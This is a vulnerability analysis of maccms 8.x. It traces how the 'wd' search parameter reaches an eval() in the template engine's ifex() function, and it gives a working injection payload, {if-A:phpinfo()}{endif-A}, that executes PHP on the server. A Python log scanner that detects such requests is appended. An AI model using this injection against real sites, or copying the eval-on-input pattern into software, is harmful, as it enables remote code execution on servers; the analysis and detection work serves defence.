Download link https://share.weiyun.com/23802397ed25681ad45c112bf34cc6db
First, open index.php:
$m = be('get', 'm');
After the m parameter is read, it is split on line 17:
$par = explode('-', $m);
Here we pass ?m=vod-search
Lines 34-39 then process it:
$acs = array('vod', 'art', 'map', 'user', 'gbook', 'comment', 'label');
if (in_array($ac, $acs)) {
    $tpl->P["module"] = $ac;
    include MAC_ROOT . '/inc/module/' . $ac . '.php';
}
This includes /inc/module/vod.php:
elseif ($method == 'search') {
    $tpl->P["siteaid"] = ...;
    $wd = be("all", "wd");
    if (!empty($wd)) { $tpl->P["wd"] = $wd; }
}
This reads the wd parameter.
Execution then reaches index.php, around line 45:
$tpl->ifex();
Trace into the function.
It begins:
function ifex() {
    if (!strpos(",".$this->H, "{if-")) { return; }
    $labelRule = buildregx('{if-([\s\S]*?):([\s\S]+?)}([\s\S]*?){endif-\1}', "is");
This defines the regex rule. $this->H is set in the vod file, /inc/module/vod.php, near line 189:
$tpl->H = loadFile(MAC_ROOT_TEMPLATE."/vod_search.html");
Back in /inc/common/template.php, line 866:
preg_match_all($labelRule, $this->H, $iar);
In effect, this matches against the wd parameter taken from the request.
It then enters the loop:
for ($m = 0; $m < $arlen; $m++) {
    $strn = $iar[1][$m];
    $strif = asp2phpif($iar[2][$m]);
Reading further down, you find the eval you are looking for.
The branch at lines 916 to 921 has the fewest restrictions:
else {
    //die("if($strif){\$ifFlag=true;} else{\$ifFlag=false;}");
    @eval("if($strif){\$ifFlag=true;} else{\$ifFlag=false;}");
    if ($ifFlag) { $this->H = str_replace($iar[0][$m], $strThen, $this->H); }
    else { $this->H = str_replace($iar[0][$m], "", $this->H); }
}
To summarize: $this->H must contain {if-. Because the wd parameter we submit contains {if-, that check can be bypassed.
The input then has to match:
{if-([\s\S]*?):([\s\S]+?)}([\s\S]*?){endif-\1}
So we submit:
{if-A:phpinfo()}{endif-A}
In preg_match_all, the content above is placed into a two-dimensional array.
What line 874 does:
for ($m = 0; $m < $arlen; $m++) {
    $strn = $iar[1][$m];
    $strif = asp2phpif($iar[2][$m]); // line 874
$strif becomes phpinfo()
The if condition on line 881 is then not satisfied:
if (strpos(",".$strThen, $labelRule2) > 0) {
Execution goes on to line 906, and the if on line 908 is not satisfied either:
if (strpos(",".$strThen, $labelRule3) > 0) {
So it enters the least restricted branch, at line 916,
which causes the command to execute.
maccms8.x Command Execution Vulnerability analysis
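A detection check for the request walked through above, as an added example that is not part of the original analysis or of maccms: it ports the page's $labelRule to Python and flags access-log entries whose query string carries a complete {if-...}{endif-...} tag, in any parameter rather than only wd. The log lines and addresses are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Python port of the page's $labelRule; the "is" flags map to IGNORECASE | DOTALL.
LABEL_RULE = re.compile(
    r"\{if-([\s\S]*?):([\s\S]+?)\}([\s\S]*?)\{endif-\1\}", re.I | re.S
)

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /index.php?m=vod-search&wd=batman HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /index.php?m=vod-search&wd=%7Bif-A%3Aphpinfo()%7D%7Bendif-A%7D HTTP/1.1" 200 90211',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /index.php?m=vod-search&wd=%7Bif-A%3Atest HTTP/1.1" 200 5120',
]


def template_tags(value):
    """Return the condition part (capture group 2) of every complete tag in value.

    Group 2 is the text that ifex() would place inside its eval'd if (...).
    """
    return [m.group(2) for m in LABEL_RULE.finditer(value)]


def scan(lines):
    """Return (line_no, parameter, condition) for each flagged query parameter."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue  # not a request line we understand
        query = urlsplit(m.group(1)).query
        # parse_qsl URL-decodes names and values once, as the web server would.
        for name, value in parse_qsl(query, keep_blank_values=True):
            for cond in template_tags(value):
                hits.append((no, name, cond))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("template tag in request: line %d, parameter %s, condition %r" % hit)
```

Only the second sample line is reported: the third contains {if- but no matching {endif-A}, so it never satisfies the rule that feeds the eval.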